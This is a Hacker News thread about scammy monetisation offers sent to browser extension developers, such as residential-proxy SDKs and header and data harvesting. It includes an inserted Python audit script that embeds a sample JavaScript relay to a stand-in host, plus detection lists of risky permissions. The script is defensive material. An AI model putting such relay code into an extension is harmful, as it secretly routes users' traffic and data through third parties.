[HN Gopher] Emails a browser extension developer gets from scammers
___________________________________________________________________
Emails a browser extension developer gets from scammers
Author : ajayyy
Score : 72 points
Date : 2021-01-23 17:37 UTC (5 hours ago)
(HTM) web link (sponsor.ajay.app)
(TXT) w3m dump (sponsor.ajay.app)
| rsync wrote:
| I believe this ecosystem is simply an extension of the prior
| systray ecosystem wherein small, sometimes free windows
| applications would bundle a "helper" app that would basically spy
| on, and advertise to, the end user.
|
| This resulted, among other things, in an almost universal
| degradation of performance and usability of Windows XP/Vista for
| ... our parents and grandparents, basically.
| agwa wrote:
| It's worse now because browser extensions auto-update which
| means that when a malicious actor buys an extension they gain
| access not only to future users but to all current users as
| well. Also, the Chrome Extension Store publicizes how many
| users each extension has, which allows malicious actors to
| operate extremely efficiently as they can easily find
| extensions to acquire and they know exactly what they're
| buying.
| sashagim wrote:
| And even worse, because they don't only hurt performance and
| usability, but they also report private information. Even if
| the data is sent anonymously, the URL itself may contain
| private information. For instance, Google themselves still
| allow sharing documents via a "private" link which is then
| stored on some monitoring service. And some of those services
| allow anyone to access and search these URLs for some premium
| plan.
| danieldbird wrote:
| "our parents and grandparents, basically."
|
| I now feel officially elderly. Cheers for that. Lol.
| Aerroon wrote:
| I think the implication here was that your parents and
| grandparents were less computer savvy at the time. This
| resulted in them installing all kinds of toolbars that
| destroyed performance.
| throwawayboise wrote:
| Not just small free apps. Oracle would install the Ask toolbar
| when you installed their database server, unless you noticed
| and un-ticked that option in one of the installer dialogs.
| _Oracle_.
| akiselev wrote:
| IIRC for a while the official Java runtime installer also
| installed the Ask toolbar.
| david422 wrote:
| I have a small website that can get a surprising amount of
| traffic. Every other day I get an email from some "SEO expert"
| wanting to redesign my site or offer some partnership so I get
| more traffic.
|
| Which is slightly amusing because I must be getting enough
| traffic for them to want to find me.
| Debug_Overload wrote:
| Almost every SEO "guru" and "expert" is a glorified snake oil
| salesman. I look at that whole industry the same way I look at
| the traditional woo-woo peddlers.
| dr_kiszonka wrote:
| That one email from Datos looks pretty professional. I don't
| know what their business is about, but they don't necessarily
| seem like scammers per se.
| kwerk wrote:
| Seems weird the first scammer asks the dev to "unsubscribe" from
| their emails in the third message. Wouldn't that hurt their
| deliverability?
| blackbear_ wrote:
| It's a way to know that there's a real human behind the
| computer screen and that the address is not fake. Even a single
| bit of information can be valuable.
| drewmol wrote:
| >Wouldn't that hurt their deliverability?
|
| If you're referring to deliverability of emails in the context
| of email spam filters then no. Having an unsubscribe option on
| repeated, unanswered solicitations would be helpful. The emails
| are not spam, and in the first email chain they are rather
| straightforward about their proposal and methods. I'm not sure
| what the _scam_ actually is here... people offering money for
| the dev to _scam_ users out of bandwidth? I do think it's noble
| of the dev to ignore the solicitation and provide exposure to
| this market however.
| bransonf wrote:
| It's pretty obvious what infatica is doing and while I agree it's
| shady, I wouldn't call it a scam.
|
| Peer-to-peer proxy doesn't mean a botnet, at least not how I
| think most people think that to mean. Rather they are routing
| traffic through residential IPs for a number of customers.
| $25-45/1000 users sounds exactly within the margins of a VPN
| provider (they even mention hola.org in the 3rd email, which is
| $2.99/m per 'premium' user or free if you become a node in the
| network) and residential proxies are also commonly used for
| scraping and other IP-sensitive work, again within those margins.
|
| I didn't find the code sample to be obfuscated, it was actually
| quite clear. It establishes a web socket with a server and simply
| passes requests through an endpoint, i.e. literally just a proxy.
|
| All that said, it's definitely shady to put this in your
| extension without users knowing. But, if you need to monetize
| something free, and make at least a good effort to inform users
| or allow them to opt out, and we trust infatica doesn't allow
| illegal use of its proxy network, then I don't really see the
| problem.
|
| There's a real need for residential IPs, no market to give each
| user $0.025, and I can't really fault someone for making a
| business out of this.
|
| Edit: I also find it ironic that the author labels datos.live a
| "scammer" when in fact they are a very legitimate business
| engaged in similar data collection to what Google already does.
| ...The same author who published an extension (in the Chrome
| Store) for YouTube
| ajayyy wrote:
| About Datos, I'll reply and see if I can get more info about
| them. I still do not understand how it would be "GDPR
| friendly", as the data for sure would not be required for the
| service.
| Nextgrid wrote:
| They call it GDPR-friendly because there is no serious
| enforcement of the GDPR and so they know they will fly under
| the (non-existent) radar.
|
| This is the same reason websites claim to "comply" with
| the GDPR with a cookie consent prompt that only allows you to
| accept (and declining is hard/impossible).
| sashagim wrote:
| What you're saying is that they are not indeed GDPR-
| friendly? That would make their claim a false one.
| yuliyp wrote:
| What "legitimate" need is there for residential IPs? These are
| internet connections that are generally less reliable than
| commercial connections. The biggest usage for them is for
| fooling web sites into the nature of the traffic they are
| serving.
| tiagod wrote:
| Web scraping is perfectly legal in many jurisdictions, as
| well as getting around the countermeasures. A datacenter IP
| is a huge red flag for those.
| arpa wrote:
| Scraping (serp/e-commerce/other).
| bransonf wrote:
| That's pretty much exactly the point. On the consumer facing
| side there is the VPN market, which people use to access
| content in remote locations or obfuscate their traffic to
| prevent surveillance/fingerprinting.
|
| On the business side, there's a real need to be able to
| scrape say LinkedIn or Amazon, which necessitates rotating
| IPs to avoid getting blocked. The legal precedent currently
| incentivizes this sort of behavior between both parties.
|
| Mentioned also, however, is that criminals can use the
| technology to advance fraud.
| cbsks wrote:
| So instead of the scraper's IP being banned, it's mine?
| That's not good.
| sashagim wrote:
| I don't believe the users are made aware of this kind of usage
| of their network. In fact, I'm pretty confident that most
| extensions bury this purposefully in such small letters it's
| impossible to understand. Which, for me, qualifies them as
| malware.
| walrus01 wrote:
| The further you dig into the "residential proxy" market, the
| more shady it gets.
|
| Google "residential proxies for sale" and follow the rabbit
| hole down...
| bransonf wrote:
| I certainly am not going to defend the whole market. I'm
| aware of many issues.
|
| But, there is a strict business need for these proxies. If
| you plan to fight giants, the first thing you need is their
| data. And you can't get it without proxies.
|
| Sure, that's another subject for debate; whether
| scraping/crawling is ethical itself.
| walrus01 wrote:
| Unfortunately it's not just scraping, they're also often
| used for outright fraud. Various online payment
| processors' fraud detection systems can be circumvented
| partially by appearing as a legit residential end user on a
| Comcast cable connection, for instance. Or lots of other
| fraudulent activities where you have a click worker in a
| cube farm in a low labor cost location, using the proxy,
| pretending to be an end user in the USA.
| butz wrote:
| Time to add user privacy and data usage dialogs to web extensions
| to inform users about "monetized" extensions, especially those
| trying to sneak in such SDKs later.
| ajayyy wrote:
| Chrome Web Store has actually started experimenting with an
| App Store style privacy page (seems to be an A/B test for now)
|
| https://media.discordapp.net/attachments/609441389423493128/...
| avipars wrote:
| Great extension, and as an app developer and very small
| influencer (several thousand followers), I still get spam and
| personalized phishing...
|
| 90% are just bots and automated attacks
| avipars wrote:
| Scraping Instagram, YT, and especially my YouTube account for
| information
| throwaway13337 wrote:
| Browser extensions are the most vulnerable everyday apps people
| use.
|
| They're given so much power so quickly. Users agree to 'view and
| modify website data' not realizing that the app can now run
| arbitrary code on their gmail/banking/whatever accounts to report
| all information including passwords. For all the concern over
| application security, little is talked about here.
|
| Browser extensions are also super important. They stand as the
| only tool for users to take back control over their experience
| from companies that are in the interest of manipulating them for
| profit whenever they can. They are uniquely our agents here.
|
| Still, each extension is a potential huge vulnerability. It's
| tough to find a balance here.
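An added example (not code from the post or from any commenter): a small audit script, in the spirit of throwaway13337's point about broad "view and modify website data" access and bransonf's description of the proxy SDK (open a WebSocket, fetch what the server asks for, send the response back). The manifest, the script text and the host `relay.example.invalid` are constructed stand-ins; the permission lists are my own heuristics, not a Chrome policy.

```python
"""Flag traits of an unpacked extension that the thread discusses:
broad host access plus a script that relays fetched responses over
a WebSocket. Inputs are constructed samples, not a real extension."""
import json
import re

# Constructed sample manifest and background script (stand-ins).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "demo-extension",
    "permissions": ["storage", "webRequest"],
    "host_permissions": ["<all_urls>"],
})
SAMPLE_SCRIPT = """
const ws = new WebSocket("wss://relay.example.invalid/socket");
ws.onmessage = async (m) => {
  const job = JSON.parse(m.data);
  const r = await fetch(job.url, {headers: job.headers});
  ws.send(JSON.stringify({id: job.id, body: await r.text()}));
};
"""

# Heuristic lists (assumptions, not an official classification).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_PERMS = {"webRequest", "webRequestBlocking", "proxy", "nativeMessaging"}

def audit_manifest(manifest_text):
    """Return findings for broad host access and network-control permissions."""
    m = json.loads(manifest_text)
    perms = set(m.get("permissions", []))
    hosts = set(m.get("host_permissions", [])) | perms
    findings = []
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    if perms & RISKY_PERMS:
        findings.append("network-control permissions: " + ", ".join(sorted(perms & RISKY_PERMS)))
    return findings

def audit_script(js):
    """Return findings for the WebSocket-relay (proxy) pattern in one script."""
    findings = []
    sockets = re.findall(r'new\s+WebSocket\(\s*["\']([^"\']+)', js)
    if sockets:
        findings.append("opens WebSocket to " + ", ".join(sockets))
    if sockets and re.search(r"\bfetch\(|XMLHttpRequest", js) and re.search(r"\.send\(", js):
        findings.append("fetches URLs and relays responses over the socket (proxy pattern)")
    return findings

def audit(manifest_text, scripts):
    """Audit a manifest plus a {filename: source} mapping of scripts."""
    out = audit_manifest(manifest_text)
    for name, js in scripts.items():
        out += [f"{name}: {f}" for f in audit_script(js)]
    return out
```

Run `audit(SAMPLE_MANIFEST, {"bg.js": SAMPLE_SCRIPT})` to see the four findings for the constructed sample; point it at the files of a real unpacked extension to audit one.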
| rakoo wrote:
| Browser extensions have exactly as much power as the browser
| itself; that's why browser vendors controlling the distribution
| of extensions is not a bad idea in itself. Maybe there's a
| greater discussion to be had about the power that browsers
| themselves have over what has now become the life of their
| users.
| evilpie wrote:
| > Browser extensions have exactly as much power as the
| browser itself
|
| I would say this is false. Browsers can run arbitrary code on
| your machine. Extensions can't even access local files. If we
| are just talking about site information like cookies I would
| agree.
| edoceo wrote:
| Local File Browser extension for Chrome
|
| https://chrome.google.com/webstore/detail/local-explorer-
| fil...
| evilpie wrote:
| Okay, but that requires installing a native code module.
| eldog_ wrote:
| Have an extension on the chrome store too and receive these
| emails regularly. Promising cash to turn your extension into
| malware. Mine is a small, specific project that took a weekend or
| so of work, so I'm sure others in the same position would be
| tempted to take them up.
| mackrevinack wrote:
| One of the things that is keeping me on Firefox is how many open
| source extensions there are. I use maybe 16 and they are all open
| source, which doesn't mean they're free of malware, but it
| definitely reduces the likelihood.
| tomaszs wrote:
| How does he know these emails are from scammers? Some of these
| seem like legitimate offers at first glance. Please don't
| downvote if this is a stupid question for you. I'd really like
| to know how to recognize a scam email in these situations as a
| browser extension dev.
| mads wrote:
| I believe the "scammer" part comes from them wanting to leech
| data off the users of the given extensions. They are upfront
| about their intentions, I think, so scammer is maybe not the
| appropriate term. "Scummer" maybe.
| tomaszs wrote:
| It seems like it is a series of emails from one sender. The
| first email is about sharing users' IPs. What can such a scammer
| do with a user's IP?
| drewmol wrote:
| They want to _leech_ bandwidth off the userbase, who
| become 'bots', to resell as a distributed proxy/botnet
| service, from my understanding at least.
| ajayyy wrote:
| I just added another email I got that I forgot about. In that
| one, it looks like they steal the user's request headers.
| Their website also disappeared a month after their email.
| dzhiurgis wrote:
| Wonder if these "partners" can be efficiently milked of their
| programmes - set up millions of browser instances in cloud...
| chovybizzass wrote:
| Sounds like the ones I get when I register a domain.
___________________________________________________________________
(page generated 2021-01-23 23:01 UTC)